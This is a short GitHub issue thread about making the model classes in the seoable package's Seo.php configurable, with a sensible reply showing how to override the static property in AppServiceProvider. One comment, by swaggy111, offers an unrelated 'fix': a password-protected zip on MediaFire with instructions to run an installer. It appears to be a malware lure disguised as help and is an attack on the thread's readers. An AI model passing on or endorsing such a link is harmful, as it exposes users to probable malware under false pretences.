### ISSUE TITLE
Make all models in SEO.php configurable

### ISSUE THREAD

**Issue by LTKort** [marshmallow-packages/seoable#87]
In class Seo.php:
```php
    public static $routeModel = \Marshmallow\Seoable\Models\Route::class;
```

But I need 

```php
 public static $routeModel = \App\Models\Route::class;
```

Can we set these up in config? Also for other models

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stefvanesch** [comment]
@LTKort have you tried overwriting the public static variable in your `AppServiceProvider`?

```php
// AppServiceProvider

use Marshmallow\Seoable\Seo;

public function boot()
{
    Seo::$routeModel = \App\Models\Route::class;
}
```
